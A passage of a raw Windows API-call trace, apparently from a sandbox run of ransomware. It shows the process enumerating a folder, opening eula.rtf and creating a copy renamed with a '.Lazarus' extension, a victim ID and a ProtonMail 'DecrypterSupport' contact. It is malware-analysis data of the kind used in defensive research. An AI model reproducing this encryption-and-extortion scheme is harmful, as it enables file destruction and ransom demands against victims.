Flags=0x0, Size=0x4) returned 0x7d050 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0070.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.378] AreFileApisANSI () returned 1 [0070.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049", lpUsedDefaultChar=0x0) returned 27 [0070.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.379] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.379] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.379] AreFileApisANSI () returned 1 [0070.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0070.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x785d0 [0070.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x785d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049") returned 27 [0070.379] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049" (normalized: "c:\\588bce7c90097ed212\\1049"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.379] GetLastError () returned 0x5 [0070.379] GetLastError () returned 0x5 [0070.379] SetLastError (dwErrCode=0x5) [0070.379] GetLastError () returned 0x5 [0070.379] SetLastError (dwErrCode=0x5) [0070.379] GetLastError () returned 0x5 [0070.379] SetLastError (dwErrCode=0x5) [0070.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x785d0 | out: hHeap=0x20000) returned 1 [0070.379] AreFileApisANSI () returned 1 [0070.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0070.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78110 [0070.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78110, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049") returned 27 [0070.380] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049" (normalized: "c:\\588bce7c90097ed212\\1049"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.380] GetLastError () returned 0x5 [0070.380] GetLastError () returned 0x5 [0070.380] SetLastError (dwErrCode=0x5) [0070.380] GetLastError () returned 0x5 [0070.380] SetLastError (dwErrCode=0x5) [0070.380] GetLastError () returned 0x5 [0070.380] SetLastError (dwErrCode=0x5) [0070.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78110 | out: hHeap=0x20000) returned 1 [0070.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0070.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0070.380] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1053", cAlternateFileName="")) returned 1 [0070.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0070.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.380] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78190 [0070.381] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.381] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0070.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0070.381] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0070.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.382] AreFileApisANSI () returned 1 [0070.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0070.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0070.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.382] AreFileApisANSI () returned 1 [0070.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0070.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0070.382] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.382] GetFileType (hFile=0x428) returned 0x1 [0070.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0070.382] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0070.383] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0070.383] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0070.383] CloseHandle (hObject=0x428) returned 1 [0070.383] AreFileApisANSI () returned 1 [0070.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0070.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0070.383] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.383] GetFileType (hFile=0x428) returned 0x1 [0070.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0070.384] CloseHandle (hObject=0x428) returned 1 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.384] AreFileApisANSI () returned 1 [0070.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0070.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0070.385] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8)) returned 1 [0070.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.385] AreFileApisANSI () returned 1 [0070.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.385] GetLastError () returned 0x0 [0070.385] SetLastError (dwErrCode=0x0) [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e2d0 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0070.385] GetLastError () returned 0x0 [0070.385] SetLastError (dwErrCode=0x0) [0070.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0070.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0070.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.386] AreFileApisANSI () returned 1 [0070.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0070.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0070.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0070.386] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.388] GetFileType (hFile=0x428) returned 0x1 [0070.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.389] AreFileApisANSI () returned 1 [0070.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0070.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0070.389] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.389] GetFileType (hFile=0x41c) returned 0x1 [0070.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.389] GetLastError () returned 0x0 [0070.389] SetLastError (dwErrCode=0x0) [0070.389] HeapFree (in: 